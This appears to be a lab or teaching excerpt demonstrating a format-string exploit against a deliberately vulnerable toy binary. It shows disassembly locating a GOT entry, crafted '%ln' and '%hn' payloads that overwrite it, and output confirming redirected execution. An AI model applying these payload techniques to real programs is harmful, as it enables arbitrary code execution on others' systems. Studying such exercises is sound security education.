exploitable.exe:     file format elf64-x86-64

Disassembly of section .init:
...
0000000000400580 <fgets@plt>:
  400580:	ff 25 b2 0a 20 00    	jmpq   *0x200ab2(%rip)        # 601038 <_GLOBAL_OFFSET_TABLE_+0x38>
  400586:	68 04 00 00 00       	pushq  $0x4
  40058b:	e9 a0 ff ff ff       	jmpq   400530 <_init+0x20>

00000000004006a6 <exploited>:
  4006a6:	55                   	push   %rbp
...
%c%c%c%c%c%c%c%c%.4195998u%ln???0x601038
$ ./exploitable.exe < attack.out > exploitable.out
$ hexdump -C exploitable.out
00000000  39 90 0a 39 38 25 25 25  30 30 30 30 30 30 30 30  |9..98%%%00000000|
00000010  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30  |0000000000000000|
*
00400690  30 30 30 30 30 30 30 30  30 30 30 30 31 38 31 34  |0000000000001814|
004006a0  33 39 34 31 36 38 3f 3f  3f 38 10 60 47 6f 74 20  |394168???8.`Got |
004006b0  68 65 72 65 21 0a                                 |here!.|
004006b6
$
%c%c%c%c%c%c%c%c%c%.991u%hn%.1000u%hn